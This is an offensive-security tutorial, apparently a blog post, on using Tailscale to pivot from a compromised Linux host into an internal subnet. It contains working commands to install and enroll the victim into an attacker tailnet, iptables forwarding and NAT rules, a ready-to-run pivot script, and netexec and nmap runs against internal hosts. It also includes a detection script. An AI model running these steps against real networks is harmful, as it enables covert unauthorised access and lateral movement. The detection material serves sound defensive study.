Bipolar Disorder: Pivoting with TailScale

Pivoting is a post-exploitation technique with many variants. In this article I demonstrate one of them: moving around a compromised network using TailScale.

Caster - Bipolar Disorder

Genre: Offensive, Experimental
Label: exploit.org
Release Date: 15 November 2024

Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov, Anastasia Graves
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
Cover Edit: Caster

https://blog.exploit.org/caster-bipolar-disorder

Intro

TailScale is a VPN solution built on the WireGuard protocol that removes much of the pain NAT and complex network topologies cause. Because it is fast and convenient, the same tool can be used by an attacker to infiltrate networks and build virtual links that bypass restrictions and reach otherwise hidden network segments.

In this article I show how an attacker can use TailScale to gain a foothold on a compromised network and then move on to other subnets, bypassing NAT restrictions and keeping the footprint small. The focus is a compromised Linux host turned into a TailScale subnet router that bridges the attacker's machine and the internal network.

Disclaimer

This article is introductory in nature and is intended solely for information security specialists conducting testing under a concluded contract. The author and the editorial staff are not liable for any damage caused by the use of the information presented. Distributing malware, disrupting systems and violating the confidentiality of correspondence are offences under the law and may result in criminal liability.

TailScale Intro

TailScale is a solution for building virtual networks between devices, an analog of the well-known ZeroTier. Its key feature is ease of use: connections between nodes are set up automatically, without complex configuration.

Key features of TS include:

  1. Ease of use: TailScale manages encryption keys and connection setup automatically, so no manual configuration is needed and a network can be deployed with minimal technical effort;
  2. NAT traversal: one of TailScale's main advantages is its ability to establish connections through NAT and firewalls. Peers punch through NAT directly where possible and fall back to TailScale's DERP relays over HTTPS where they cannot, which makes it ideal for reaching systems behind routers and firewalls;
  3. Versatility: TailScale supports a wide range of routing and network access control capabilities. For example, a node can advertise routes to its local networks and make them available to other devices on the TailScale network (a "subnet router"). This is exactly the feature the attacker relies on in this article;
  4. Cross-platform: TailScale runs on Windows, Linux, macOS, iOS and Android, so it can be used on almost any device, for both personal use and corporate needs;
  5. Flexibility in network management: TailScale offers a management console where you can add new nodes, manage permissions and monitor activity.

To get started with TS, you must register an account.

This is done very simply, so I will not describe the process in detail.

Scenario

The following scenario is covered in this article. An attacker on the Internet has compromised a Linux machine and, after privilege escalation, holds root. The compromised machine has two interfaces; the attacker's task is to reach the infrastructure behind eth1.

This is accomplished by installing TailScale on both the attacker's and the compromised machine, then configuring routing and NAT on the compromised host.

Scenario

Host      Address                              Operating System
Attacker  100.X.Y.Z (TailScale virtual link)   Kali Linux 2024.3
Victim    100.X.Y.Z (TailScale virtual link)   Debian 12
RB7       172.16.150.223/24                    Windows 10 Enterprise LTSC
RB8       172.16.150.221/24                    Windows 10 Enterprise LTSC
RB9       172.16.150.224/24                    Windows 10 Enterprise LTSC
RB10      172.16.150.226/24                    Windows 10 Enterprise LTSC

Remarks

  • The attacker is on the Internet and has compromised a host sitting behind NAT;
  • Root privileges are required to install TS and to run tailscaled.

TS Deploying (Compromised Host)

First, TailScale must be installed on the compromised machine. This is done by downloading the official install script and executing it:

@compromised:~# curl -fsSL https://tailscale.com/install.sh | sh

Then bring TailScale up; this takes a single command, which prints a login URL that enrolls the compromised machine into the attacker's tailnet:

@compromised:~# tailscale up

To authenticate, visit:

	https://login.tailscale.com/a/10ec90a1013477

Success.

After opening the link in a browser logged into the attacker's TailScale account and clicking "Connect", the compromised machine joins the TailScale network and the command reports "Success."

The new node can be verified in the TS admin console:

Once TailScale is installed and running, a virtual interface tailscale0 appears on the compromised machine; it carries the TS virtual network traffic:

4: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 100.77.225.125/32 scope global tailscale0
       valid_lft forever preferred_lft forever
    inet6 fd7a:115c:a1e0::ae01:e17d/128 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::231a:9bfb:31a6:f5b3/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever

Now the route has to be advertised. According to the network diagram, eth1 of the compromised machine sits in 172.16.150.0/24.

The advertisement is needed so that the attacker's node, once it accepts routes, receives this prefix and can reach the internal infrastructure through the compromised host. Two commands:

root@compromised:~# tailscale down
root@compromised:~# tailscale up --advertise-routes=172.16.150.0/24

The TS service is stopped and brought back up with the --advertise-routes argument for the 172.16.150.0/24 subnet. At this point tailscale up warns that IP forwarding is disabled on the host; that is dealt with in the Routing, NAT section below.

An advertised route is not distributed to peers until it is approved. After restarting TS with --advertise-routes, open the compromised machine in the admin console (Machines, then "Edit route settings") and enable the 172.16.150.0/24 subnet route:

This completes the initial installation of TailScale on the compromised machine. I'll come back to the routing and NAT settings a bit later; now the same steps are needed on the attacker's machine.

Why use 100.X.Y.Z addresses?

Tailscale automatically assigns each device in the tailnet a unique IP address from the range RFC 6598 defines for Carrier-Grade NAT (CGNAT).

The CGNAT range is 100.64.0.0/10, i.e. 100.64.0.0 to 100.127.255.255. It is a special-purpose block (RFC 5735, since superseded by RFC 6890), comparable to the private ranges 10.0.0.0/8 or 192.168.0.0/16.

Tailscale uses the CGNAT range for two reasons:

  • It rarely overlaps with the address plans of private networks, which almost always use 10.0.0.0/8, 172.16.0.0/12 or 192.168.0.0/16;
  • It is reserved for the hop between a customer's private network and the Internet, where traffic is NATed once more, which matches how Tailscale's own NAT traversal sits on top of existing networks.

Using CGNAT addresses lets Tailscale operate alongside existing networks without address conflicts.

TS Deploying (Attacker Host)

Same old same old: download and execute the install script. Note that in "sudo curl ... | sh" sudo would apply only to curl, not to the shell that runs the script; the script escalates itself with sudo where it needs to, so it is run as a regular user:

caster@kali:~$ curl -fsSL https://tailscale.com/install.sh | sh

Then TS service activation:

caster@kali:~$ sudo tailscale up

To authenticate, visit:

	https://login.tailscale.com/a/1506661201d021

After clicking "Connect", the attacker's machine joins the TS network, and both Kali and the victim are now listed in the admin console:

Kali & Victim in TS network

Kali also gets its own tailscale0 virtual interface for the virtual network:

3: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 100.97.65.120/32 scope global tailscale0
       valid_lft forever preferred_lft forever
    inet6 fd7a:115c:a1e0::ff01:4178/128 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::8519:d82:f240:e9bf/64 scope link stable-privacy proto kernel_ll 
       valid_lft forever preferred_lft forever

On Linux, advertised subnet routes are not accepted automatically, so TailScale on the attacker's machine has to be restarted with the --accept-routes argument:

caster@kali:~$ sudo tailscale down
caster@kali:~$ sudo tailscale up --accept-routes

The attacker can then reach 172.16.150.0/24 through this route.

No route but...

Notably, the route for 172.16.150.0/24 does not appear in the operating system's main routing table (ip route), yet routing through TS works. On Linux, tailscaled installs its routes in a dedicated routing table (52) and adds ip rules that steer matching traffic into it, so the route is visible with "ip route show table 52" or "ip rule", not with a plain "ip route".

Routing, NAT

Routing and NAT configuration is the key to a working tunnel: it lets the compromised host forward traffic between its interfaces and handle packets from both sides correctly. Three commands do the job, each covering one function.

Forwarding

First, enable kernel-level forwarding by switching on packet forwarding:

@compromised:~# sysctl -w net.ipv4.ip_forward=1

This sets the ip_forward parameter, which lets the host pass IP packets between its interfaces. Without it the compromised host silently drops the attacker's packets instead of forwarding them to eth1, so every NAT and routing setting that follows depends on it. Note that sysctl -w is not persistent: to survive a reboot the setting must also be written to a file under /etc/sysctl.d.

FW Rules

Now add iptables rules so that packets forwarded between the tunnel and eth1 are accepted. If the FORWARD chain's policy is already ACCEPT these are redundant; with a DROP policy they are required:

@compromised:~# iptables -A FORWARD -i eth1 -o tailscale0 -m state --state RELATED,ESTABLISHED -j ACCEPT
@compromised:~# iptables -A FORWARD -i tailscale0 -o eth1 -j ACCEPT

Rules Breakdown

  • The first rule accepts packets entering from eth1 and leaving via tailscale0 only when they belong to a connection conntrack already knows (RELATED,ESTABLISHED), i.e. replies from the internal hosts to sessions the attacker opened through the tunnel. Internal hosts cannot open new connections towards the tailnet;
  • The second rule accepts everything that arrives from tailscale0 and exits via eth1, i.e. the attacker's traffic towards the target subnet.

To finish, add source NAT so the internal hosts in 172.16.150.0/24 see the attacker's traffic as coming from the compromised machine's own eth1 address. The outgoing interface in this rule is eth1, not tailscale0: packets heading for 172.16.150.0/24 leave through eth1, and a POSTROUTING rule matching -o tailscale0 would never see them:

@compromised:~# iptables -t nat -A POSTROUTING -o eth1 -d 172.16.150.0/24 -j MASQUERADE

Without this rewrite RB7-RB10 would try to answer a 100.x.y.z source address for which they have no route. One caveat: tailscaled by default already performs exactly this SNAT for advertised subnet routes (the --snat-subnet-routes option of tailscale up defaults to true) and installs its own ts-forward and ts-postrouting chains, so a subnet router often works even before these rules are added. The explicit rules matter when that default is turned off or when the FORWARD policy is DROP. With them in place the tunnel is transparent: the attacker reaches the internal hosts and their replies flow back through the tunnel.
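The whole forwarding/NAT step above as one idempotent script, plus the table-52 check from the "No route but..." section. This is an added example and not the article's own setup; the interface names, the subnet and the constructed "ip route show table 52" sample are assumptions, and the rules are applied only when the script is invoked with the "apply" argument on the compromised host.

```shell
#!/bin/sh
# Added example (not from the original article): corrected forwarding/NAT setup
# for a TailScale subnet router on a compromised Linux host, plus a check that
# the advertised prefix is present in tailscaled's routing table.
# Assumptions (not from the page): LAN_IF/TS_IF/SUBNET defaults below; table 52
# is the routing table tailscaled uses on Linux.
set -eu

LAN_IF="${LAN_IF:-eth1}"
TS_IF="${TS_IF:-tailscale0}"
SUBNET="${SUBNET:-172.16.150.0/24}"
TS_TABLE=52

# Emit the rules as text. MASQUERADE is applied on the LAN side (-o eth1):
# packets from the attacker's 100.x address towards the target subnet must
# leave eth1 with the compromised host's own address, or the internal hosts
# would try to reply to a 100.64.0.0/10 address they have no route for.
ts_pivot_rules() {
    lan="$1"; ts="$2"; net="$3"
    cat <<EOF
iptables -A FORWARD -i $lan -o $ts -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i $ts -o $lan -d $net -j ACCEPT
iptables -t nat -A POSTROUTING -o $lan -s 100.64.0.0/10 -d $net -j MASQUERADE
EOF
}

# Apply idempotently: "-C" checks whether a rule exists, "-A" appends only if not.
ts_pivot_apply() {
    sysctl -w net.ipv4.ip_forward=1 >/dev/null
    printf 'net.ipv4.ip_forward = 1\n' > /etc/sysctl.d/99-forward.conf   # survive reboot
    ts_pivot_rules "$LAN_IF" "$TS_IF" "$SUBNET" | while IFS= read -r rule; do
        check=$(printf '%s' "$rule" | sed 's/ -A / -C /')
        if ! $check 2>/dev/null; then $rule; fi
    done
}

# Return 0 if SUBNET has a route in the given "ip route show table N" output.
# tailscaled keeps its routes in table 52, not in the main table, which is why
# a plain "ip route" on the attacker's Kali shows nothing for 172.16.150.0/24.
ts_route_present() {
    table_out="$1"; net="$2"
    printf '%s\n' "$table_out" | awk -v n="$net" '$1 == n { found = 1 } END { exit !found }'
}

# Constructed sample of "ip route show table 52" on the attacker node
# (illustrative values, not captured from the article's lab).
SAMPLE_TABLE52='100.77.225.125 dev tailscale0
172.16.150.0/24 dev tailscale0'

if [ "${1:-}" = "apply" ]; then
    ts_pivot_apply
    if ts_route_present "$(ip route show table "$TS_TABLE")" "$SUBNET"; then
        echo "route for $SUBNET present in table $TS_TABLE"
    else
        echo "route for $SUBNET missing: approve it in the admin console and use --accept-routes"
    fi
fi
```

Run it as root on the compromised host with "sh pivot.sh apply"; without the argument it only defines the functions, so the rule text can be reviewed first with "ts_pivot_rules eth1 tailscale0 172.16.150.0/24".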

Impact

After all the configuration, the attacker has connectivity to 172.16.150.0/24. To demonstrate the impact of this pivoting method clearly, I will run a couple of utilities through the tunnel.

NetExec

caster@kali:~$ netexec smb 172.16.150.0/24 -u caster -p caster 
SMB         172.16.150.224  445    RB9              [*] Windows 10 / Server 2019 Build 19041 (name:RB9) (domain:RB9) (signing:False) (SMBv1:False)
SMB         172.16.150.221  445    RB8              [*] Windows 10 / Server 2019 Build 19041 (name:RB8) (domain:RB8) (signing:False) (SMBv1:False)
SMB         172.16.150.223  445    RB7              [*] Windows 10 / Server 2019 Build 19041 (name:RB7) (domain:RB7) (signing:False) (SMBv1:False)
SMB         172.16.150.226  445    RB10             [*] Windows 10 / Server 2019 Build 19041 (name:RB10) (domain:RB10) (signing:False) (SMBv1:False)
SMB         172.16.150.224  445    RB9              [+] RB9\caster:caster 
SMB         172.16.150.221  445    RB8              [+] RB8\caster:caster 
SMB         172.16.150.223  445    RB7              [+] RB7\caster:caster 
SMB         172.16.150.226  445    RB10             [+] RB10\caster:caster 
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00


Port Scan

caster@kali:~$ sudo nmap -Pn -n -p 445,3389 172.16.150.0/24 --open --min-rate=1280 --max-rate=2000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-15 09:02 +05
Nmap scan report for 172.16.150.221
Host is up (0.00056s latency).

PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.150.223
Host is up (0.00073s latency).

PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.150.224
Host is up (0.00050s latency).

PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.150.226
Host is up (0.00049s latency).

PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap done: 256 IP addresses (256 hosts up) scanned in 1.00 seconds
caster@kali:~$ 


Proof of traffic flow through TS

caster@kali:~$ mtr -n 172.16.150.221

Traceroute (mtr)

As the screenshot shows (here towards RB8), traffic for the 172.16.150.0/24 network passes through the compromised TailScale node before reaching the target.

Outro

Tailscale is a tool for building secure networks on top of the Internet. It provides easy setup, automatic routing and secure connectivity between devices without complex configuration. Like any other technology, however, Tailscale can be used for purposes its authors did not intend.

In the hands of an attacker, Tailscale becomes an unusually effective pivoting tool. Using its routing, NAT and automatic NAT traversal, an attacker can reach internal networks and pass traffic between segments while blending in with ordinary encrypted traffic: the transport is WireGuard over UDP, or HTTPS to Tailscale's DERP relays when hole punching fails, so no inbound port has to be opened and the perimeter firewall sees only outbound connections. A properly configured Tailscale tunnel therefore reaches private resources that a traditional VPN setup could not. "Invisible" is too strong a word, though: the tailscaled process, the tailscale0 interface, the default UDP port 41641, the state under /var/lib/tailscale, the ts-* netfilter chains and the coordination traffic to login.tailscale.com are all ordinary indicators that host-based and network monitoring can alert on.

Using Tailscale for pivoting is a fairly specific piece of research that differs significantly from the traditional methods. It requires an understanding of networking, NAT and careful configuration of routing and firewalls, which makes the approach more involved but also gives the attacker a flexible foothold in the target networks.
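To make the detection caveat concrete, here is an added host-side check that is not part of the original article. It looks for the artifacts the procedure above leaves on a Linux host: a tailscaled UDP socket, the tailscale0 interface, Tailscale's own ts-* netfilter chains and a FORWARD rule from tailscale0 into a LAN interface (the subnet-router tell-tale). Each check parses command output passed in as text, so it runs offline against the constructed samples below; invoked with "live" it gathers the real output. The indicator values are Tailscale's Linux defaults, the sample lines are constructed, and nothing here comes from the article's own lab.

```shell
#!/bin/sh
# Added example, not from the original article: indicators a TailScale pivot
# leaves on a Linux host. Checks take command output as text so they can be
# exercised offline; "live" mode collects real output on the host under review.
# Indicator values (tailscale0, UDP 41641, ts-* chains, /var/lib/tailscale) are
# Tailscale's Linux defaults; the sample outputs are constructed, not captured.
set -eu

# 1. A tailscaled socket in "ss -lunp" output (default port is UDP 41641, but
#    matching on the process name also catches a non-default port).
ts_listener() { printf '%s\n' "$1" | grep -q 'users:(("tailscaled"'; }

# 2. The tailscale0 interface in "ip -o link" output.
ts_iface() { printf '%s\n' "$1" | grep -q '[[:space:]]tailscale0[:@]'; }

# 3. Tailscale's own chains in "iptables -S" / "iptables -t nat -S" output.
ts_chains() { printf '%s\n' "$1" | grep -qE '^-N ts-(input|forward|postrouting)$'; }

# 4. Subnet-router tell-tale: a forward rule from tailscale0 into a LAN interface.
ts_subnet_router() {
    printf '%s\n' "$1" | grep -qE -- '-A (FORWARD|ts-forward) .*-i tailscale0 .*-o [[:alnum:]]+ .*-j ACCEPT'
}

# Count the indicators present; the caller decides what threshold to alert on.
ts_indicator_count() {
    ss_out="$1"; link_out="$2"; ipt_out="$3"
    n=0
    ts_listener "$ss_out"       && n=$((n + 1))
    ts_iface "$link_out"        && n=$((n + 1))
    ts_chains "$ipt_out"        && n=$((n + 1))
    ts_subnet_router "$ipt_out" && n=$((n + 1))
    echo "$n"
}

# Constructed samples resembling a host configured as in the article.
SAMPLE_SS='udp   UNCONN 0      0        0.0.0.0:41641      0.0.0.0:*    users:(("tailscaled",pid=1337,fd=13))'
SAMPLE_LINK='2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
4: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN'
SAMPLE_IPT='-P FORWARD ACCEPT
-N ts-forward
-N ts-input
-A FORWARD -i tailscale0 -o eth1 -j ACCEPT
-A ts-forward -i tailscale0 -j MARK --set-xmark 0x40000/0xff0000'
# Constructed sample of a host without Tailscale.
CLEAN_LINK='2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP'

if [ "${1:-}" = "live" ]; then
    n=$(ts_indicator_count "$(ss -lunp 2>/dev/null)" "$(ip -o link)" \
        "$(iptables -S 2>/dev/null; iptables -t nat -S 2>/dev/null)")
    echo "tailscale indicators found: $n"
    if [ -e /var/lib/tailscale/tailscaled.state ]; then
        echo "state file present: /var/lib/tailscale/tailscaled.state"
    fi
fi
```

Run as root with "sh ts_check.sh live" on a host under review; a count of 2 or more, or the presence of the state file, is a reliable sign that tailscaled has been enrolled on the machine, and the subnet-router rule in particular indicates it is being used to bridge a LAN.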
